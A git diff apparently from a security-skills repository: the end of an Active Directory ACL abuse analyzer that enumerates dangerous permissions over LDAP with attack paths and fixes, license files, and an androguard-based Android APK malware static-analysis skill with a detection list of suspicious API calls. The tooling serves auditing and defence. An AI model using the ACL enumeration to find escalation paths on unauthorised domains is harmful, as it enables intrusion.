 def resolve_sid(conn: Connection, base_dn: str, sid: str) -> str:
    try:
        conn.search(base_dn, f"(objectSid={sid})", attributes=["sAMAccountName", "cn"])
        if conn.entries:
            entry = conn.entries[0]
            return str(entry.sAMAccountName) if hasattr(entry, "sAMAccountName") else str(entry.cn)
    except Exception:
        pass
    return sid
 def get_domain_sid(conn: Connection, base_dn: str) -> str:
    conn.search(base_dn, "(objectClass=domain)", attributes=["objectSid"])
    if conn.entries:
        raw = conn.entries[0].objectSid.raw_values[0]
        return parse_sid(raw)
    return ""
 def analyze_acls(dc_ip: str, domain: str, username: str, password: str,
                 target_ou: str) -> dict:
    server = Server(dc_ip, get_info=ALL, use_ssl=False)
    domain_parts = domain.split(".")
    base_dn = ",".join(f"DC={p}" for p in domain_parts)
    search_base = target_ou if target_ou else base_dn
    ntlm_user = f"{domain}\\{username}"
    conn = Connection(server, user=ntlm_user, password=password,
                      authentication=NTLM, auto_bind=True)
    domain_sid = get_domain_sid(conn, base_dn)
    conn.search(
        search_base,
        "(|(objectClass=user)(objectClass=group)(objectClass=computer)(objectClass=organizationalUnit))",
        search_scope=SUBTREE,
        attributes=["distinguishedName", "sAMAccountName", "objectClass", "nTSecurityDescriptor"],
    )
    findings = []
    objects_scanned = 0
    sid_cache = {}
    for entry in conn.entries:
        objects_scanned += 1
        dn = str(entry.distinguishedName)
        obj_classes = [str(c) for c in entry.objectClass.values] if hasattr(entry, "objectClass") else []
        obj_type = "unknown"
        for oc in obj_classes:
            if oc.lower() in ("user", "group", "computer", "organizationalunit"):
                obj_type = oc.lower()
                break
        if not hasattr(entry, "nTSecurityDescriptor"):
            continue
        raw_sd = entry.nTSecurityDescriptor.raw_values
        if not raw_sd:
            continue
        sd_bytes = raw_sd[0]
        aces = parse_acl(sd_bytes)
        for ace in aces:
            trustee_sid = ace["trustee_sid"]
            if is_admin_sid(trustee_sid, domain_sid):
                continue
            if trustee_sid not in sid_cache:
                sid_cache[trustee_sid] = resolve_sid(conn, base_dn, trustee_sid)
            trustee_name = sid_cache[trustee_sid]
            for perm in ace["permissions"]:
                if perm in ("Delete", "DeleteChild", "Self", "WriteProperty", "ExtendedRight"):
                    severity = "medium"
                else:
                    severity = "critical"
                attack = ATTACK_PATHS.get(perm, {}).get(obj_type,
                         f"{perm} on {obj_type} may allow privilege escalation")
                findings.append({
                    "severity": severity,
                    "target_object": dn,
                    "target_type": obj_type,
                    "trustee": trustee_name,
                    "trustee_sid": trustee_sid,
                    "permission": perm,
                    "access_mask": ace["access_mask"],
                    "ace_type": ace["ace_type"],
                    "attack_path": attack,
                    "remediation": f"Remove {perm} ACE for {trustee_name} on {dn}",
                })
    conn.unbind()
    findings.sort(key=lambda f: 0 if f["severity"] == "critical" else 1)
    return {
        "domain": domain,
        "domain_sid": domain_sid,
        "search_base": search_base,
        "objects_scanned": objects_scanned,
        "dangerous_aces_found": len(findings),
        "findings": findings,
    }
 def main():
    parser = argparse.ArgumentParser(description="Active Directory ACL Abuse Analyzer")
    parser.add_argument("--dc-ip", required=True, help="Domain Controller IP address")
    parser.add_argument("--domain", required=True, help="AD domain name (e.g., corp.example.com)")
    parser.add_argument("--username", required=True, help="Domain username for LDAP bind")
    parser.add_argument("--password", required=True, help="Domain user password")
    parser.add_argument("--target-ou", default=None,
                        help="Target OU distinguished name to scope the search")
    parser.add_argument("--output", default=None, help="Output JSON file path")
    args = parser.parse_args()
    result = analyze_acls(args.dc_ip, args.domain, args.username,
                          args.password, args.target_ou)
    report = json.dumps(result, indent=2)
    if args.output:
        with open(args.output, "w") as f:
            f.write(report)
    print(report)
 if __name__ == "__main__":
    main()
@@ -0,0 +1,201 @@
                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
   1. Definitions.
      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.
      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.
      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -0,0 +1,68 @@
 ---
 name: analyzing-android-malware-with-apktool
 description: Perform static analysis of Android APK malware samples using apktool
  for decompilation, jadx for Java source recovery, and androguard for permission
  analysis, manifest inspection, and suspicious API call detection.
 domain: cybersecurity
 subdomain: malware-analysis
 tags:
 - Android
 - APK
 - apktool
 - jadx
 - androguard
 - mobile-malware
 - static-analysis
 - reverse-engineering
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1406
 - T1407
 - T1626.001
 - T1655.001
 - T1521.001
 ---
 # Analyzing Android Malware with Apktool
 ## Overview
 Android malware distributed as APK files can be statically analyzed to extract permissions, activities, services, broadcast receivers, and suspicious API calls without executing the sample. This skill uses androguard for programmatic APK analysis, identifying dangerous permission combinations, obfuscated code patterns, dynamic code loading, reflection-based API calls, and network communication indicators.
 ## When to Use
 - When investigating security incidents that require analyzing android malware with apktool
 - When building detection rules or threat hunting queries for this domain
 - When SOC analysts need structured procedures for this analysis type
 - When validating security monitoring coverage for related attack techniques
 ## Prerequisites
 - Python 3.9+ with `androguard`
 - apktool (for resource decompilation)
 - jadx (for Java source recovery, optional)
 - Isolated analysis environment (VM or sandbox)
 - Sample APK files for analysis
 ## Steps
 1. Parse APK with androguard to extract manifest metadata
 2. Enumerate requested permissions and flag dangerous combinations
 3. List activities, services, receivers, and providers from manifest
 4. Scan for suspicious API calls (reflection, crypto, SMS, telephony)
 5. Detect dynamic code loading patterns (DexClassLoader, Runtime.exec)
 6. Extract hardcoded URLs, IPs, and C2 indicators from strings
 7. Generate risk assessment report with MITRE ATT&CK mobile mappings
 ## Expected Output
 - JSON report with permission analysis, component listing, suspicious API calls, network indicators, and risk score
 - Extracted strings and potential IOCs from the APK
@@ -0,0 +1,69 @@
 # API Reference — Analyzing Android Malware with Apktool
 ## Libraries Used
 - **androguard**: Python APK/DEX analysis — `AnalyzeAPK()`, permission enumeration, API call scanning
 - **re**: Regex extraction of URLs, IPs, base64 patterns from DEX strings
 - **json**: JSON serialization for analysis reports
 ## CLI Interface
 ```
 python agent.py sample.apk permissions
 python agent.py sample.apk manifest
 python agent.py sample.apk apis
 python agent.py sample.apk strings
 python agent.py sample.apk full
 python agent.py sample.apk           # defaults to full analysis
 ```
 ## Core Functions
 ### `analyze_permissions(apk)` — Permission risk assessment
 Calls `apk.get_permissions()`. Flags 20 dangerous permissions including
 SEND_SMS, READ_CONTACTS, BIND_DEVICE_ADMIN, BIND_ACCESSIBILITY_SERVICE.
 Risk: CRITICAL >= 8 dangerous, HIGH >= 5, MEDIUM >= 2, LOW < 2.
 ### `analyze_manifest(apk)` — Manifest component extraction
 Calls `apk.get_activities()`, `get_services()`, `get_receivers()`, `get_providers()`.
 Returns package name, version, SDK levels, and all component lists.
 ### `scan_suspicious_apis(dx)` — Suspicious API call detection
 Searches DEX analysis for 14 patterns including:
 - `Runtime.exec`, `ProcessBuilder.start` — command execution
 - `DexClassLoader.loadClass` — dynamic code loading
 - `Method.invoke`, `Class.forName` — reflection
 - `Cipher.getInstance` — cryptographic operations
 - `SmsManager.sendTextMessage` — SMS abuse
 ### `extract_strings(dx, apk)` — IOC extraction from DEX strings
 Regex extraction of HTTP/HTTPS URLs, external IP addresses, and base64 strings.
 Filters out private IP ranges (10.x, 192.168.x, 172.16.x, 127.x).
 ### `detect_obfuscation(apk, dx)` — Obfuscation indicator detection
 Checks for single-letter class names (ProGuard), multi-DEX, native libraries.
 ### `full_analysis(apk_path)` — Comprehensive malware assessment
 ## Androguard API
 | Method | Returns |
 |--------|---------|
 | `AnalyzeAPK(path)` | `(APK, list[DEX], Analysis)` tuple |
 | `apk.get_permissions()` | List of Android permissions |
 | `apk.get_activities()` | Activity component names |
 | `apk.get_services()` | Service component names |
 | `apk.get_receivers()` | BroadcastReceiver names |
 | `apk.get_package()` | Package name string |
 | `dx.find_methods(classname, methodname)` | Matching method analysis objects |
 | `dx.get_strings()` | All strings from DEX files |
 | `dx.get_classes()` | All class analysis objects |
 ## Risk Scoring
 | Factor | Max Points |
 |--------|-----------|
 | Dangerous permissions (8 pts each) | 40 |
 | Suspicious API calls (10 pts each) | 30 |
 | External IPs (5 pts each) | 15 |
 | Obfuscation detected | 15 |
 ## Dependencies
 - `androguard` >= 3.4.0
 - Isolated analysis environment recommended
@@ -0,0 +1,228 @@
 #!/usr/bin/env python3
 """Agent for static analysis of Android APK malware using androguard."""
 import json
 import re
 import argparse
 from datetime import datetime
 try:
    from androguard.core.apk import APK
    from androguard.core.dex import DEX
    from androguard.misc import AnalyzeAPK
 except ImportError:
    APK = None
    AnalyzeAPK = None
 DANGEROUS_PERMISSIONS = [
    "android.permission.SEND_SMS", "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS", "android.permission.READ_CONTACTS",
    "android.permission.READ_CALL_LOG", "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA", "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.READ_PHONE_STATE", "android.permission.CALL_PHONE",
    "android.permission.WRITE_EXTERNAL_STORAGE", "android.permission.READ_EXTERNAL_STORAGE",
    "android.permission.INSTALL_PACKAGES", "android.permission.REQUEST_INSTALL_PACKAGES",
    "android.permission.SYSTEM_ALERT_WINDOW", "android.permission.BIND_ACCESSIBILITY_SERVICE",
    "android.permission.BIND_DEVICE_ADMIN", "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.WRITE_SETTINGS", "android.permission.CHANGE_WIFI_STATE",
 ]
 SUSPICIOUS_API_PATTERNS = [
    r"Ljava/lang/Runtime;->exec",
    r"Ljava/lang/ProcessBuilder;->start",
    r"Ldalvik/system/DexClassLoader;->loadClass",
    r"Ljava/lang/reflect/Method;->invoke",
    r"Ljava/lang/Class;->forName",
    r"Ljavax/crypto/Cipher;->getInstance",
    r"Landroid/telephony/SmsManager;->sendTextMessage",
    r"Landroid/app/admin/DevicePolicyManager;->lockNow",
    r"Landroid/content/pm/PackageManager;->setComponentEnabledSetting",
    r"Ljava/net/HttpURLConnection;->connect",
    r"Lokhttp3/OkHttpClient;->newCall",
    r"Landroid/webkit/WebView;->loadUrl",
    r"Landroid/os/Build;->SERIAL",
    r"Landroid/provider/Settings\$Secure;->getString",
 ]
 def analyze_permissions(apk):
    """Analyze requested permissions and flag dangerous ones."""
    permissions = apk.get_permissions()
    dangerous = [p for p in permissions if p in DANGEROUS_PERMISSIONS]
    return {
        "total_permissions": len(permissions),
        "permissions": permissions,
        "dangerous_permissions": dangerous,
        "dangerous_count": len(dangerous),
        "permission_risk": "CRITICAL" if len(dangerous) >= 8 else "HIGH" if len(dangerous) >= 5 else "MEDIUM" if len(dangerous) >= 2 else "LOW",
    }
 def analyze_manifest(apk):
    """Extract manifest components: activities, services, receivers, providers."""
    activities = apk.get_activities()
    services = apk.get_services()
    receivers = apk.get_receivers()
    providers = apk.get_providers()
    return {
        "package_name": apk.get_package(),
        "app_name": apk.get_app_name(),
        "version_name": apk.get_androidversion_name(),
        "version_code": apk.get_androidversion_code(),
        "min_sdk": apk.get_min_sdk_version(),
        "target_sdk": apk.get_target_sdk_version(),
        "activities": list(activities),
        "services": list(services),
        "receivers": list(receivers),
        "providers": list(providers),
        "activity_count": len(activities),
        "service_count": len(services),
        "receiver_count": len(receivers),
        "provider_count": len(providers),
    }
 def scan_suspicious_apis(dx):
    """Scan DEX analysis for suspicious API calls."""
    findings = []
    if not dx:
        return findings
    for pattern in SUSPICIOUS_API_PATTERNS:
        class_name = pattern.split(";->")[0] + ";"
        method_name = pattern.split(";->")[1] if ";->" in pattern else None
        for method in dx.find_methods(classname=class_name, methodname=method_name):
            xrefs = list(method.get_xref_from())
            if xrefs:
                findings.append({
                    "api": pattern,
                    "callers": len(xrefs),
                    "first_caller_class": str(xrefs[0][0].name) if xrefs else None,
                })
    return findings
 def extract_strings(dx, apk):
    """Extract suspicious strings: URLs, IPs, base64 patterns."""
    url_pattern = re.compile(r'https?://[\w\-._~:/?#\[\]@!$&\'()*+,;=]+', re.IGNORECASE)
    ip_pattern = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
    b64_pattern = re.compile(r'[A-Za-z0-9+/]{30,}={0,2}')
    urls = set()
    ips = set()
    b64_strings = []
    if dx:
        for s in dx.get_strings():
            val = str(s)
            urls.update(url_pattern.findall(val))
            ips.update(ip_pattern.findall(val))
            b64_matches = b64_pattern.findall(val)
            b64_strings.extend(b64_matches[:5])
    private_ips = {"10.", "192.168.", "172.16.", "127.0."}
    external_ips = [ip for ip in ips if not any(ip.startswith(p) for p in private_ips)]
    return {
        "urls": sorted(urls)[:30],
        "external_ips": sorted(external_ips)[:20],
        "suspicious_base64": b64_strings[:10],
        "url_count": len(urls),
        "external_ip_count": len(external_ips),
    }
 def detect_obfuscation(apk, dx):
    """Detect code obfuscation indicators."""
    indicators = []
    if dx:
        short_class_names = 0
        for cls in dx.get_classes():
            name = str(cls.name)
            parts = name.replace("/", ".").split(".")
            if any(len(p) == 1 and p.isalpha() for p in parts):
                short_class_names += 1
        if short_class_names > 10:
            indicators.append({"type": "single_letter_classes", "count": short_class_names})
    dex_files = [f for f in apk.get_files() if f.endswith(".dex")]
    if len(dex_files) > 1:
        indicators.append({"type": "multi_dex", "dex_count": len(dex_files)})
    native_libs = [f for f in apk.get_files() if f.endswith(".so")]
    if native_libs:
        indicators.append({"type": "native_libraries", "libs": native_libs[:10]})
    return {
        "obfuscation_indicators": indicators,
        "likely_obfuscated": len(indicators) > 0,
    }
 def full_analysis(apk_path):
    """Run comprehensive APK malware analysis."""
    if not APK or not AnalyzeAPK:
        return {"error": "androguard not installed: pip install androguard"}
    a, d, dx = AnalyzeAPK(apk_path)
    perm_analysis = analyze_permissions(a)
    manifest = analyze_manifest(a)
    suspicious_apis = scan_suspicious_apis(dx)
    strings = extract_strings(dx, a)
    obfuscation = detect_obfuscation(a, dx)
    risk_score = 0
    risk_score += min(perm_analysis["dangerous_count"] * 8, 40)
    risk_score += min(len(suspicious_apis) * 10, 30)
    risk_score += min(strings["external_ip_count"] * 5, 15)
    risk_score += 15 if obfuscation["likely_obfuscated"] else 0
    risk_score = min(risk_score, 100)
    return {
        "analysis_type": "Android APK Static Analysis",
        "timestamp": datetime.utcnow().isoformat(),
        "file": apk_path,
        "manifest": manifest,
        "permissions": perm_analysis,
        "suspicious_apis": suspicious_apis[:20],
        "strings": strings,
        "obfuscation": obfuscation,
        "risk_score": risk_score,
        "risk_level": "CRITICAL" if risk_score >= 70 else "HIGH" if risk_score >= 50 else "MEDIUM" if risk_score >= 25 else "LOW",
        "mitre_techniques": [
            {"id": "T1418", "name": "Software Discovery"} if manifest["service_count"] > 5 else None,
            {"id": "T1417", "name": "Input Capture"} if "android.permission.BIND_ACCESSIBILITY_SERVICE" in perm_analysis["permissions"] else None,
            {"id": "T1582", "name": "SMS Control"} if "android.permission.SEND_SMS" in perm_analysis["permissions"] else None,
            {"id": "T1404", "name": "Exploitation for Privilege Escalation"} if any("DevicePolicyManager" in a.get("api", "") for a in suspicious_apis) else None,
        ],
    }
 def main():
    parser = argparse.ArgumentParser(description="Android APK Malware Analysis Agent")
    parser.add_argument("apk", help="Path to APK file")
    sub = parser.add_subparsers(dest="command")
    sub.add_parser("permissions", help="Analyze permissions")
    sub.add_parser("manifest", help="Extract manifest components")
    sub.add_parser("apis", help="Scan for suspicious API calls")
    sub.add_parser("strings", help="Extract URLs, IPs, and encoded strings")
    sub.add_parser("full", help="Full malware analysis")
    args = parser.parse_args()
    if args.command == "full" or args.command is None:
        result = full_analysis(args.apk)
    else:
        a, d, dx = AnalyzeAPK(args.apk)
        if args.command == "permissions":
            result = analyze_permissions(a)
        elif args.command == "manifest":
            result = analyze_manifest(a)
        elif args.command == "apis":
            result = scan_suspicious_apis(dx)
        elif args.command == "strings":
            result = extract_strings(dx, a)
    print(json.dumps(result, indent=2, default=str))
 if __name__ == "__main__":
    main()
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
